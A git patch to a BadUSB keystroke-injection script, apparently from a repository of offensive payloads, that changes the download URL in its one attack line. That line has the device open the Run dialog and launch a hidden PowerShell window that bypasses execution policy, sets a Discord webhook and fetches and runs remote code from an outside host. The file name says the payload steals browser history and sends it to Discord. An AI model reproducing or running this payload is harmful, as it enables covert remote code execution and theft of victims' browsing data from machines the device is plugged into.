From 0348f357bfe6b6411dd04b8bfcb530b6bc9402f2 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 17 Jun 2025 10:15:27 +0000 Subject: [PATCH] Update Browser-History-to-Discord.txt --- Browser-History-to-Discord/Browser-History-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Browser-History-to-Discord/Browser-History-to-Discord.txt b/Browser-History-to-Discord/Browser-History-to-Discord.txt index ad5ce0c..3e2e2fa 100644 --- a/Browser-History-to-Discord/Browser-History-to-Discord.txt +++ b/Browser-History-to-Discord/Browser-History-to-Discord.txt @@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_bh_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/hist | iex ENTER